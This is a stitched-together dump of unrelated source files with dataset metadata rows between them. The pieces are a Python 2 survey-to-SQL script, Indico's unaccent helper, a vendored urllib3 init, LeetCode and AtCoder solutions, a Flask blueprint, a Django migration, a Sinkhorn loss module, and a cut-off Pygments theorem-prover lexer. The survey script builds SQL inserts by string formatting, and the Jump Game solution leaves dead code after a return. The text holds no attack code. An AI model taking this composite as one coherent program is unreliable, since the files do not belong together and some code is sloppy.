for sub_file in sub_files:
if "FP Post Survey" in sub_file:
post_path = sub_path + sub_file + "/"
post_files = os.listdir(post_path)
for post_file in post_files:
if "survey_updated" in post_file:
fp = open(post_path + post_file, "r")
# To process question_id line
question_id_line = fp.readline()
question_id_array = question_id_line.split(",")
# To process question description line
question_line = fp.readline()
question_line = question_line.replace("\",NA,\"","\",\"NA\",\"")
question_array = question_line.split("\",\"")
                            for i in range(15,113):  # post-survey question columns in the CSV export
question_id = course_id + "_post_" + question_id_array[i].replace("\"","")
# print question_id
question_array[i] = question_array[i].replace("\'", "\\'")
write_string = "\r\n" + "insert into survey_description (question_id, course_id, question_type, description) values"
write_string += "('%s','%s','%s','%s');\r\n" % (question_id, course_id, "post", question_array[i])
survey_description_file.write(write_string)
response_lines = fp.readlines()
num_multipleID = 0
for response_line in response_lines:
response_line = response_line.replace("\",NA,\"","\",\"NA\",\"")
subRegex = re.compile("\(([^\(\)]*)\)")
matches = subRegex.findall(response_line)
if not len(matches) == 0:
for match in matches:
response_line = response_line.replace(match, "")
response_array = response_line.split("\",\"")
if response_array[118] in id_map.keys():
course_user_id = course_id + "_" + id_map[response_array[118]]
for i in range(15,113):
question_id = course_id + "_post_" + question_id_array[i].replace("\"","")
response_id = course_user_id + "_post_" + question_id_array[i].replace("\"","")
if response_id not in response_id_set:
response_array[i] = response_array[i].replace("\'", "\\'")
write_string = "\r\n" + "insert into survey_response (response_id, course_user_id, question_id, answer) values"
write_string += "('%s','%s','%s','%s');\r\n" % (response_id, course_user_id, question_id, response_array[i])
survey_response_file.write(write_string)
response_id_set.add(response_id)
# else:
# print response_id + "\t" + response_array[118] + "\t" + question_array[i]
else:
num_multipleID += 1
print "Post - The number of response is: " + str(len(response_lines))
print "Post - The number of response with multiple/empty IDs is: " + str(num_multipleID)
survey_description_file.close()
survey_response_file.close()
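# Input layout assumed by survey_mode(path), inferred from the walks above:
#   <path>/<org>-<course>-<run>-course_structure-*        -> source of course_id
#   <path>/2014T3_FP101x/FP Course Data/*-anon-ids*       -> anonymized-to-global id map
#   <path>/2014T3_FP101x/FP Pre Survey/*survey_updated*   -> pre-survey CSV
#   <path>/2014T3_FP101x/FP Post Survey/*survey_updated*  -> post-survey CSV
# The two .sql outputs land in Results/FP101x/, three os.path.dirname() hops
# above `path`.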
| [
"[email protected]"
] | |
2a947f6dde626fc5c7a608db41b0b51fbd6eafdb | 8d5ba6747531cbd43d63d32265fd608f9081c3b7 | /.venv/lib/python2.7/site-packages/indico/core/db/sqlalchemy/custom/unaccent.py | b4838177828f13481121fa0984a94d46e9307b19 | [] | no_license | Collinsnyamao/indico | 0e433b78803afae5b1ac90483db1f3d90ce2fddb | 32adf8123e266eb81439b654abc993b98e0cd7f2 | refs/heads/master | 2020-03-18T04:55:40.386595 | 2018-06-02T13:45:47 | 2018-06-02T13:45:47 | 134,314,163 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,436 | py | # This file is part of Indico.
# Copyright (C) 2002 - 2018 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from sqlalchemy import DDL, Index, text
from sqlalchemy.event import listens_for
from sqlalchemy.sql import func
from sqlalchemy.sql.elements import conv
from indico.util.string import to_unicode
# if you wonder why search_path is set and the two-argument `unaccent` function is used,
# see this post on stackoverflow: http://stackoverflow.com/a/11007216/298479
SQL_FUNCTION_UNACCENT = '''
CREATE FUNCTION indico.indico_unaccent(value TEXT)
RETURNS TEXT
AS $$
BEGIN
RETURN unaccent('unaccent', value);
END;
$$
LANGUAGE plpgsql IMMUTABLE SET search_path = public, pg_temp;
'''
def _should_create_function(ddl, target, connection, **kw):
sql = "SELECT COUNT(*) FROM information_schema.routines WHERE routine_name = 'indico_unaccent'"
count = connection.execute(text(sql)).scalar()
return not count
def create_unaccent_function(conn):
"""Creates the unaccent function if it doesn't exist yet.
In TESTING mode it always uses the no-op version to have a
consistent database setup.
"""
DDL(SQL_FUNCTION_UNACCENT).execute_if(callable_=_should_create_function).execute(conn)
def define_unaccented_lowercase_index(column):
"""Defines an index that uses the indico_unaccent function.
Since this is usually used for searching, the column's value is
also converted to lowercase before being unaccented. To make proper
use of this index, use this criterion when querying the table::
db.func.indico.indico_unaccent(db.func.lower(column)).ilike(...)
The index will use the trgm operators which allow very efficient LIKE
even when searching e.g. ``LIKE '%something%'``.
:param column: The column the index should be created on, e.g.
``User.first_name``
"""
@listens_for(column.table, 'after_create')
def _after_create(target, conn, **kw):
assert target is column.table
col_func = func.indico.indico_unaccent(func.lower(column))
index_kwargs = {'postgresql_using': 'gin',
'postgresql_ops': {col_func.key: 'gin_trgm_ops'}}
Index(conv('ix_{}_{}_unaccent'.format(column.table.name, column.name)), col_func, **index_kwargs).create(conn)
def unaccent_match(column, value, exact):
from indico.core.db import db
value = to_unicode(value).replace('%', r'\%').replace('_', r'\_').lower()
if not exact:
value = '%{}%'.format(value)
# we always use LIKE, even for an exact match. when using the pg_trgm indexes this is
# actually faster than `=`
return db.func.indico.indico_unaccent(db.func.lower(column)).ilike(db.func.indico.indico_unaccent(value))
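# Illustrative query usage (`User` is a hypothetical model):
#   User.query.filter(unaccent_match(User.first_name, u'Jose', exact=True))
# compiles to indico_unaccent(lower(first_name)) ILIKE indico_unaccent('jose'),
# which the trigram index from define_unaccented_lowercase_index can serve.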
| [
"[email protected]"
] | |
6371e03f7e86aed6d39e751ba81d7471c80155ef | 7d2f933ed3c54e128ecaec3a771817c4260a8458 | /venv/Lib/site-packages/requests/packages/urllib3/__init__.py | f669e1f517d93579a48a00c7ca81b40ac6d206c5 | [] | no_license | danielmoreira12/BAProject | c61dfb1d0521eb5a28eef9531a00e744bfb0e26a | 859f588305d826a35cc8f7d64c432f54a0a2e031 | refs/heads/master | 2021-01-02T07:17:39.267278 | 2020-02-25T22:27:43 | 2020-02-25T22:27:43 | 239,541,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,700 | py | # urllib3/__init__.py
# Copyright 2008-2013 Andrey Petrov and contributors (see CONTRIBUTORS.txt)
#
# This module is part of urllib3 and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
urllib3 - Thread-safe connection pooling and re-using.
"""
__author__ = 'Andrey Petrov ([email protected])'
__license__ = 'MIT'
__version__ = 'dev'
# Set default logging handler to avoid "No handler found" warnings.
import logging
from . import exceptions
from .connectionpool import (
HTTPConnectionPool,
HTTPSConnectionPool,
connection_from_url
)
from .filepost import encode_multipart_formdata
from .poolmanager import PoolManager, ProxyManager, proxy_from_url
from .response import HTTPResponse
from .util import make_headers, get_host, Timeout
try: # Python 2.7+
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
def add_stderr_logger(level=logging.DEBUG):
"""
Helper for quickly adding a StreamHandler to the logger. Useful for
debugging.
Returns the handler after adding it.
"""
# This method needs to be in this __init__.py to get the __name__ correct
# even if urllib3 is vendored within another package.
logger = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
logger.addHandler(handler)
logger.setLevel(level)
logger.debug('Added an stderr logging handler to logger: %s' % __name__)
return handler
# ... Clean up.
del NullHandler
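# Illustrative use of the helper above from application code (assuming this
# vendored copy is importable as requests.packages.urllib3):
#   import logging
#   from requests.packages import urllib3
#   urllib3.add_stderr_logger(logging.DEBUG)  # connection logs now go to stderr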
| [
"[email protected]"
] | |
f48b6acd7862cead47ba1fafc6a3ebd6557b73be | 303bac96502e5b1666c05afd6c2e85cf33f19d8c | /solutions/python3/993.py | d918d769447829914b6898f916ac2d314071b6a7 | [
"MIT"
] | permissive | jxhangithub/leetcode | 5e82f4aeee1bf201e93e889e5c4ded2fcda90437 | 0de1af607557d95856f0e4c2a12a56c8c57d731d | refs/heads/master | 2022-05-22T12:57:54.251281 | 2022-03-09T22:36:20 | 2022-03-09T22:36:20 | 370,508,127 | 1 | 0 | MIT | 2022-03-09T22:36:20 | 2021-05-24T23:16:10 | null | UTF-8 | Python | false | false | 430 | py | class Solution:
def isCousins(self, root: TreeNode, x: int, y: int) -> bool:
        # dfs returns (depth, parent) for the node whose val equals `mod`,
        # or None when the subtree does not contain it
        def dfs(node, parent, depth, mod):
            if node:
                if node.val == mod:
                    return depth, parent
                return dfs(node.left, node, depth + 1, mod) or dfs(node.right, node, depth + 1, mod)
        # the two (depth, parent) 2-tuples concatenate into one 4-tuple
        dx, px, dy, py = dfs(root, None, 0, x) + dfs(root, None, 0, y)
return dx == dy and px != py | [
"[email protected]"
] | |
869d4de40b4774adacf3db6705df1c3d7a5ab419 | cb2411c5e770bcdd07b170c2bc07f5e0cc72fc86 | /Greedy/55. Jump Game.py | 6ad22c17c7c535c3c1f269e0caf4426d60a13b2f | [] | no_license | roy355068/Algo | f79cf51662832e33664fc1d2479f79405d586e2e | 14febbb5d8504438ef143678dedc89d4b61b07c9 | refs/heads/master | 2021-05-11T04:32:11.434762 | 2018-01-30T00:01:26 | 2018-01-30T00:01:26 | 117,941,600 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,905 | py | # Given an array of non-negative integers, you are initially positioned at the first index of the array.
# Each element in the array represents your maximum jump length at that position.
# Determine if you are able to reach the last index.
# For example:
# A = [2,3,1,1,4], return true.
# A = [3,2,1,0,4], return false.
# Idea: keep a maximumReach variable tracking the farthest index reachable so far.
# If i > maximumReach, index i cannot be reached by any previous jump, so we can
# stop early and return False; otherwise, once maximumReach covers the index of
# the last element, the last element is reachable and we return True.
class Solution(object):
def canJump(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
# O(N ^ 2) time, O(N) space complexity
if not nums or len(nums) == 1:
return True
        # jump is a DP array marking whether each index is reachable
jump = [False for _ in xrange(len(nums))]
jump[0] = True
for i in xrange(len(nums)):
step = nums[i]
j = i + 1
# jump[i] == True means that this index is reachable based
# on the jump steps before it
if jump[i] == True:
                # mark every index reachable from the current standpoint
while j <= len(nums) - 1 and j < i + step + 1:
jump[j] = True
j += 1
return jump[-1]
        # Optimized alternative: O(N) time, O(1) space. Note: the `return
        # jump[-1]` above exits the method first, so this greedy version is
        # dead code as written; keep whichever variant is wanted.
i, reachable = 0, 0
        # if i ever exceeds reachable, the current index can never be reached
        # by jumping from any previous index, so the loop stops early
while i < len(nums) and i <= reachable:
reachable = max(reachable, i + nums[i])
i += 1
return i == len(nums)
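# Quick self-checks matching the examples above (left as comments for LeetCode):
#   Solution().canJump([2, 3, 1, 1, 4]) -> True
#   Solution().canJump([3, 2, 1, 0, 4]) -> False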
| [
"[email protected]"
] | |
add36c49f08156fa9f65d5e079441f0e3c7f56f7 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03168/s086851558.py | 7143c7be26364089fb75fade50516b0a34c2696e | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | import sys
def input(): return sys.stdin.readline().rstrip()
def main():
n=int(input())
P=list(map(float,input().split()))
    dp=[[0]*(n+1) for _ in range(n)]  # dp[i][j]: probability that coins 0..i show exactly j heads
dp[0][0]=1-P[0]
dp[0][1]=P[0]
for i in range(1,n):
for j in range(i+2):
if j==0:
dp[i][j]=dp[i-1][j]*(1-P[i])
else:
dp[i][j]=dp[i-1][j-1]*P[i]+dp[i-1][j]*(1-P[i])
print(sum(dp[-1][n//2+1:]))
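# Recurrence implemented above, restated:
#   dp[i][j] = dp[i-1][j-1] * P[i] + dp[i-1][j] * (1 - P[i]),
#   with base case dp[0][0] = 1 - P[0], dp[0][1] = P[0].
# The answer sum(dp[-1][n//2+1:]) is the probability that more than n//2 coins
# show heads (in the original task n is odd, so this is a strict heads majority).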
if __name__=='__main__':
main() | [
"[email protected]"
] | |
7d442a07bfb8f720507da67a316b7bfbddefbabe | e29b450bf924b983023db41a0cdea97cde129880 | /reversible/sinkhorn.py | da994a5c781f3dbf5244c34a45a3d33e8ec14a12 | [] | no_license | afcarl/generative-reversible | b9efedad155d9c08f0f299f0b861ff6ff53607cf | e21b0846c654e0e041562f715bc5ddd90dde0e07 | refs/heads/master | 2020-03-21T03:29:34.655671 | 2018-05-26T18:53:54 | 2018-05-26T18:53:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,783 | py | import torch as th
import numpy as np  # np.log is used by transport_mat_sinkhorn_below_entropy
from reversible.gaussian import get_gauss_samples
from reversible.util import log_sum_exp, ensure_on_same_device, var_to_np
def sinkhorn_to_gauss_dist(outs, mean, std, **kwargs):
gauss_samples = get_gauss_samples(len(outs), mean, std)
return sinkhorn_sample_loss(outs, gauss_samples, **kwargs)
def M(u, v, C, epsilon):
"Modified cost for logarithmic updates"
"$M_{ij} = (-c_{ij} + u_i + v_j) / \epsilon$"
return (-C + u.unsqueeze(1) + v.unsqueeze(0)) / epsilon
def sinkhorn_sample_loss(samples_a, samples_b, epsilon=0.01, stop_threshold=0.1,
max_iters=50, normalize_cost_matrix=False, max_normed_entropy=None,
normalize_by_empirical_std_a=False):
assert normalize_cost_matrix in [False, 'mean', 'max']
diffs = samples_a.unsqueeze(1) - samples_b.unsqueeze(0)
if normalize_by_empirical_std_a:
stds = th.std(samples_a.detach(), dim=0, keepdim=True)
stds = th.clamp(stds, min=1e-5)
diffs = diffs / stds
C = th.sum(diffs * diffs, dim=2)
del diffs
C_nograd = C.detach()
if normalize_cost_matrix == 'mean':
C_nograd = C_nograd / th.mean(C_nograd)
elif normalize_cost_matrix == 'max':
C_nograd = C_nograd / th.max(C_nograd)
if max_normed_entropy is None:
estimated_trans_th = estimate_transport_matrix_sinkhorn(
C_nograd, epsilon=epsilon, stop_threshold=stop_threshold,
max_iters=max_iters)
else:
estimated_trans_th, _ = transport_mat_sinkhorn_below_entropy(
C_nograd, start_eps=epsilon, stop_threshold=stop_threshold,
max_iters_sinkhorn=max_iters, max_iters_for_entropy=10,
max_normed_entropy=max_normed_entropy)
cost = th.sqrt(th.sum(estimated_trans_th * C)) # Sinkhorn cost
return cost
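# Illustrative call (shapes assumed, not taken from the repo): both sample sets
# are (N, D) float tensors on the same device, e.g.
#   loss = sinkhorn_sample_loss(th.randn(128, 2), th.randn(128, 2), epsilon=0.01)
#   loss.backward()  # differentiable w.r.t. the inputs via the cost matrix C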
def transport_mat_sinkhorn_below_entropy(
C, start_eps, max_normed_entropy, max_iters_for_entropy,
max_iters_sinkhorn=50, stop_threshold=1e-3):
normed_entropy = max_normed_entropy + 1
iteration = 0
cur_eps = start_eps
while (normed_entropy > max_normed_entropy) and (iteration < max_iters_for_entropy):
transport_mat = estimate_transport_matrix_sinkhorn(
C, epsilon=cur_eps, stop_threshold=stop_threshold, max_iters=max_iters_sinkhorn)
relevant_mat = transport_mat[transport_mat > 0]
normed_entropy = -th.sum(relevant_mat * th.log(relevant_mat)) / np.log(transport_mat.numel() * 1.)
normed_entropy = var_to_np(normed_entropy)
iteration += 1
cur_eps = cur_eps / 2
return transport_mat, cur_eps
def estimate_transport_matrix_sinkhorn(C, epsilon=0.01, stop_threshold=0.1,
max_iters=50):
n1 = C.size()[0]
n2 = C.size()[1]
mu = th.autograd.Variable(1. / n1 * th.FloatTensor(n1).fill_(1),
requires_grad=False)
nu = th.autograd.Variable(1. / n2 * th.FloatTensor(n2).fill_(1),
requires_grad=False)
mu, nu, C = ensure_on_same_device(mu, nu, C)
u, v, err = 0. * mu, 0. * nu, 0.
actual_nits = 0 # to check if algorithm terminates because of threshold or max iterations reached
for i in range(max_iters):
u1 = u # useful to check the update
u = epsilon * (
th.log(mu) - log_sum_exp(M(u, v, C, epsilon), dim=1, keepdim=True).squeeze()) + u
v = epsilon * (
th.log(nu) - log_sum_exp(M(u, v, C, epsilon).t(), dim=1, keepdim=True).squeeze()) + v
err = (u - u1).abs().sum()
actual_nits += 1
if var_to_np(err < stop_threshold).all():
break
estimated_transport_matrix = th.exp(M(u, v, C, epsilon))
return estimated_transport_matrix
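# The loop above performs log-domain Sinkhorn updates with
# M_ij = (-C_ij + u_i + v_j) / eps:
#   u <- eps * (log(mu) - logsumexp_j M(u, v))   + u
#   v <- eps * (log(nu) - logsumexp_i M(u, v)^T) + v
# stopping once ||u - u_prev||_1 < stop_threshold, and returns T = exp(M(u, v)).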
| [
"[email protected]"
] | |
89f7995781d60bb6ec3ed228079f873bf72f7ce1 | f47df27f960b3c5abebf16145026d20fc81f062b | /dheeranet/views/home.py | 9d2568894366f760bc5e482240240503dcf65e9a | [] | no_license | dheera/web-dheeranet | 34eec0591872d01afd441ce97a4853c95fde18a8 | 1faceb4d54d91ae1b7ee3f7e449ee3f224600b08 | refs/heads/master | 2021-01-22T06:32:12.403454 | 2017-04-10T20:55:33 | 2017-04-10T20:55:33 | 20,196,792 | 5 | 3 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | from flask import Blueprint, render_template, abort, request
from jinja2 import TemplateNotFound
from dheeranet import static_bucket
from dheeranet.cache import s3_get_cached
import json
home = Blueprint('home', __name__, template_folder='../template')
@home.route('/')
def show():
home_items = json.loads(s3_get_cached(static_bucket, '__home__'))
news_items = filter(lambda x:x['type']=='news', home_items)
return render_template('home.html', news_items = news_items)
| [
"[email protected]"
] | |
c2ad9a49e4e23ffa98d960a2818b4175b1dece93 | b5029b5710f72010690c5e57fe5c045dcff2701c | /books_authors_app/migrations/0001_initial.py | 9f233b82732ee72e3c171a7a7c24c182c0d25b6d | [] | no_license | Jallnutt1/first_django_project | 2d059ed815227cf5c72af67e4e4074e95edf1508 | 200b98623292e806a407badf1cb9311e25bd561d | refs/heads/main | 2023-04-04T00:50:19.183891 | 2021-04-13T18:56:03 | 2021-04-13T18:56:03 | 357,659,099 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,166 | py | # Generated by Django 2.2 on 2021-04-09 00:55
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Books',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('desc', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
| [
"{ID}+{username}@users.noreply.github.com"
] | {ID}+{username}@users.noreply.github.com |
4c9afb7f1a1c3156c3c0e419a9d664957618cf06 | 159d4ae61f4ca91d94e29e769697ff46d11ae4a4 | /venv/lib/python3.9/site-packages/pygments/lexers/theorem.py | ec55a32ea39569297ed9647deaf213b073c5d5f6 | [
"MIT"
] | permissive | davidycliao/bisCrawler | 729db002afe10ae405306b9eed45b782e68eace8 | f42281f35b866b52e5860b6a062790ae8147a4a4 | refs/heads/main | 2023-05-24T00:41:50.224279 | 2023-01-22T23:17:51 | 2023-01-22T23:17:51 | 411,470,732 | 8 | 0 | MIT | 2023-02-09T16:28:24 | 2021-09-28T23:48:13 | Python | UTF-8 | Python | false | false | 19,507 | py | """
pygments.lexers.theorem
~~~~~~~~~~~~~~~~~~~~~~~
Lexers for theorem-proving languages.
:copyright: Copyright 2006-2021 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, default, words
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Generic
__all__ = ['CoqLexer', 'IsabelleLexer', 'LeanLexer']
class CoqLexer(RegexLexer):
"""
For the `Coq <http://coq.inria.fr/>`_ theorem prover.
.. versionadded:: 1.5
"""
name = 'Coq'
aliases = ['coq']
filenames = ['*.v']
mimetypes = ['text/x-coq']
flags = re.UNICODE
keywords1 = (
# Vernacular commands
'Section', 'Module', 'End', 'Require', 'Import', 'Export', 'Variable',
'Variables', 'Parameter', 'Parameters', 'Axiom', 'Hypothesis',
'Hypotheses', 'Notation', 'Local', 'Tactic', 'Reserved', 'Scope',
'Open', 'Close', 'Bind', 'Delimit', 'Definition', 'Let', 'Ltac',
'Fixpoint', 'CoFixpoint', 'Morphism', 'Relation', 'Implicit',
'Arguments', 'Set', 'Unset', 'Contextual', 'Strict', 'Prenex',
'Implicits', 'Inductive', 'CoInductive', 'Record', 'Structure',
'Canonical', 'Coercion', 'Theorem', 'Lemma', 'Corollary',
'Proposition', 'Fact', 'Remark', 'Example', 'Proof', 'Goal', 'Save',
'Qed', 'Defined', 'Hint', 'Resolve', 'Rewrite', 'View', 'Search',
'Abort', 'Admitted',
'Show', 'Print', 'Printing', 'All', 'Graph', 'Projections', 'inside',
'outside', 'Check', 'Global', 'Instance', 'Class', 'Existing',
'Universe', 'Polymorphic', 'Monomorphic', 'Context'
)
keywords2 = (
# Gallina
'forall', 'exists', 'exists2', 'fun', 'fix', 'cofix', 'struct',
'match', 'end', 'in', 'return', 'let', 'if', 'is', 'then', 'else',
'for', 'of', 'nosimpl', 'with', 'as',
)
keywords3 = (
# Sorts
'Type', 'Prop', 'SProp',
)
keywords4 = (
# Tactics
'pose', 'set', 'move', 'case', 'elim', 'apply', 'clear', 'hnf', 'intro',
'intros', 'generalize', 'rename', 'pattern', 'after', 'destruct',
'induction', 'using', 'refine', 'inversion', 'injection', 'rewrite',
'congr', 'unlock', 'compute', 'ring', 'field', 'replace', 'fold',
'unfold', 'change', 'cutrewrite', 'simpl', 'have', 'suff', 'wlog',
'suffices', 'without', 'loss', 'nat_norm', 'assert', 'cut', 'trivial',
'revert', 'bool_congr', 'nat_congr', 'symmetry', 'transitivity', 'auto',
'split', 'left', 'right', 'autorewrite', 'tauto', 'setoid_rewrite',
'intuition', 'eauto', 'eapply', 'econstructor', 'etransitivity',
'constructor', 'erewrite', 'red', 'cbv', 'lazy', 'vm_compute',
'native_compute', 'subst',
)
keywords5 = (
# Terminators
'by', 'done', 'exact', 'reflexivity', 'tauto', 'romega', 'omega',
'assumption', 'solve', 'contradiction', 'discriminate',
'congruence',
)
keywords6 = (
# Control
'do', 'last', 'first', 'try', 'idtac', 'repeat',
)
# 'as', 'assert', 'begin', 'class', 'constraint', 'do', 'done',
# 'downto', 'else', 'end', 'exception', 'external', 'false',
# 'for', 'fun', 'function', 'functor', 'if', 'in', 'include',
# 'inherit', 'initializer', 'lazy', 'let', 'match', 'method',
# 'module', 'mutable', 'new', 'object', 'of', 'open', 'private',
# 'raise', 'rec', 'sig', 'struct', 'then', 'to', 'true', 'try',
# 'type', 'val', 'virtual', 'when', 'while', 'with'
keyopts = (
'!=', '#', '&', '&&', r'\(', r'\)', r'\*', r'\+', ',', '-', r'-\.',
'->', r'\.', r'\.\.', ':', '::', ':=', ':>', ';', ';;', '<', '<-',
'<->', '=', '>', '>]', r'>\}', r'\?', r'\?\?', r'\[', r'\[<', r'\[>',
r'\[\|', ']', '_', '`', r'\{', r'\{<', r'\|', r'\|]', r'\}', '~', '=>',
r'/\\', r'\\/', r'\{\|', r'\|\}',
# 'Π', 'Σ', # Not defined in the standard library
'λ', '¬', '∧', '∨', '∀', '∃', '→', '↔', '≠', '≤', '≥',
)
operators = r'[!$%&*+\./:<=>?@^|~-]'
prefix_syms = r'[!?~]'
infix_syms = r'[=<>@^|&+\*/$%-]'
tokens = {
'root': [
(r'\s+', Text),
(r'false|true|\(\)|\[\]', Name.Builtin.Pseudo),
(r'\(\*', Comment, 'comment'),
(words(keywords1, prefix=r'\b', suffix=r'\b'), Keyword.Namespace),
(words(keywords2, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keywords3, prefix=r'\b', suffix=r'\b'), Keyword.Type),
(words(keywords4, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keywords5, prefix=r'\b', suffix=r'\b'), Keyword.Pseudo),
(words(keywords6, prefix=r'\b', suffix=r'\b'), Keyword.Reserved),
# (r'\b([A-Z][\w\']*)(\.)', Name.Namespace, 'dotted'),
(r'\b([A-Z][\w\']*)', Name),
(r'(%s)' % '|'.join(keyopts[::-1]), Operator),
(r'(%s|%s)?%s' % (infix_syms, prefix_syms, operators), Operator),
(r"[^\W\d][\w']*", Name),
(r'\d[\d_]*', Number.Integer),
(r'0[xX][\da-fA-F][\da-fA-F_]*', Number.Hex),
(r'0[oO][0-7][0-7_]*', Number.Oct),
(r'0[bB][01][01_]*', Number.Bin),
(r'-?\d[\d_]*(.[\d_]*)?([eE][+\-]?\d[\d_]*)', Number.Float),
(r"'(?:(\\[\\\"'ntbr ])|(\\[0-9]{3})|(\\x[0-9a-fA-F]{2}))'", String.Char),
(r"'.'", String.Char),
(r"'", Keyword), # a stray quote is another syntax element
(r'"', String.Double, 'string'),
(r'[~?][a-z][\w\']*:', Name),
(r'\S', Name.Builtin.Pseudo),
],
'comment': [
(r'[^(*)]+', Comment),
(r'\(\*', Comment, '#push'),
(r'\*\)', Comment, '#pop'),
(r'[(*)]', Comment),
],
'string': [
(r'[^"]+', String.Double),
(r'""', String.Double),
(r'"', String.Double, '#pop'),
],
'dotted': [
(r'\s+', Text),
(r'\.', Punctuation),
(r'[A-Z][\w\']*(?=\s*\.)', Name.Namespace),
(r'[A-Z][\w\']*', Name.Class, '#pop'),
(r'[a-z][a-z0-9_\']*', Name, '#pop'),
default('#pop')
],
}
def analyse_text(text):
if 'Qed' in text and 'Proof' in text:
return 1
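# Illustrative use of the lexer above through pygments' public API:
#   from pygments import highlight
#   from pygments.formatters import TerminalFormatter
#   print(highlight("Lemma t : True. Proof. auto. Qed.", CoqLexer(), TerminalFormatter()))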
class IsabelleLexer(RegexLexer):
"""
For the `Isabelle <http://isabelle.in.tum.de/>`_ proof assistant.
.. versionadded:: 2.0
"""
name = 'Isabelle'
aliases = ['isabelle']
filenames = ['*.thy']
mimetypes = ['text/x-isabelle']
keyword_minor = (
'and', 'assumes', 'attach', 'avoids', 'binder', 'checking',
'class_instance', 'class_relation', 'code_module', 'congs',
'constant', 'constrains', 'datatypes', 'defines', 'file', 'fixes',
'for', 'functions', 'hints', 'identifier', 'if', 'imports', 'in',
'includes', 'infix', 'infixl', 'infixr', 'is', 'keywords', 'lazy',
'module_name', 'monos', 'morphisms', 'no_discs_sels', 'notes',
'obtains', 'open', 'output', 'overloaded', 'parametric', 'permissive',
'pervasive', 'rep_compat', 'shows', 'structure', 'type_class',
'type_constructor', 'unchecked', 'unsafe', 'where',
)
keyword_diag = (
'ML_command', 'ML_val', 'class_deps', 'code_deps', 'code_thms',
'display_drafts', 'find_consts', 'find_theorems', 'find_unused_assms',
'full_prf', 'help', 'locale_deps', 'nitpick', 'pr', 'prf',
'print_abbrevs', 'print_antiquotations', 'print_attributes',
'print_binds', 'print_bnfs', 'print_bundles',
'print_case_translations', 'print_cases', 'print_claset',
'print_classes', 'print_codeproc', 'print_codesetup',
'print_coercions', 'print_commands', 'print_context',
'print_defn_rules', 'print_dependencies', 'print_facts',
'print_induct_rules', 'print_inductives', 'print_interps',
'print_locale', 'print_locales', 'print_methods', 'print_options',
'print_orders', 'print_quot_maps', 'print_quotconsts',
'print_quotients', 'print_quotientsQ3', 'print_quotmapsQ3',
'print_rules', 'print_simpset', 'print_state', 'print_statement',
'print_syntax', 'print_theorems', 'print_theory', 'print_trans_rules',
'prop', 'pwd', 'quickcheck', 'refute', 'sledgehammer', 'smt_status',
'solve_direct', 'spark_status', 'term', 'thm', 'thm_deps', 'thy_deps',
'try', 'try0', 'typ', 'unused_thms', 'value', 'values', 'welcome',
'print_ML_antiquotations', 'print_term_bindings', 'values_prolog',
)
keyword_thy = ('theory', 'begin', 'end')
keyword_section = ('header', 'chapter')
keyword_subsection = (
'section', 'subsection', 'subsubsection', 'sect', 'subsect',
'subsubsect',
)
keyword_theory_decl = (
'ML', 'ML_file', 'abbreviation', 'adhoc_overloading', 'arities',
'atom_decl', 'attribute_setup', 'axiomatization', 'bundle',
'case_of_simps', 'class', 'classes', 'classrel', 'codatatype',
'code_abort', 'code_class', 'code_const', 'code_datatype',
'code_identifier', 'code_include', 'code_instance', 'code_modulename',
'code_monad', 'code_printing', 'code_reflect', 'code_reserved',
'code_type', 'coinductive', 'coinductive_set', 'consts', 'context',
'datatype', 'datatype_new', 'datatype_new_compat', 'declaration',
'declare', 'default_sort', 'defer_recdef', 'definition', 'defs',
'domain', 'domain_isomorphism', 'domaindef', 'equivariance',
'export_code', 'extract', 'extract_type', 'fixrec', 'fun',
'fun_cases', 'hide_class', 'hide_const', 'hide_fact', 'hide_type',
'import_const_map', 'import_file', 'import_tptp', 'import_type_map',
'inductive', 'inductive_set', 'instantiation', 'judgment', 'lemmas',
'lifting_forget', 'lifting_update', 'local_setup', 'locale',
'method_setup', 'nitpick_params', 'no_adhoc_overloading',
'no_notation', 'no_syntax', 'no_translations', 'no_type_notation',
'nominal_datatype', 'nonterminal', 'notation', 'notepad', 'oracle',
'overloading', 'parse_ast_translation', 'parse_translation',
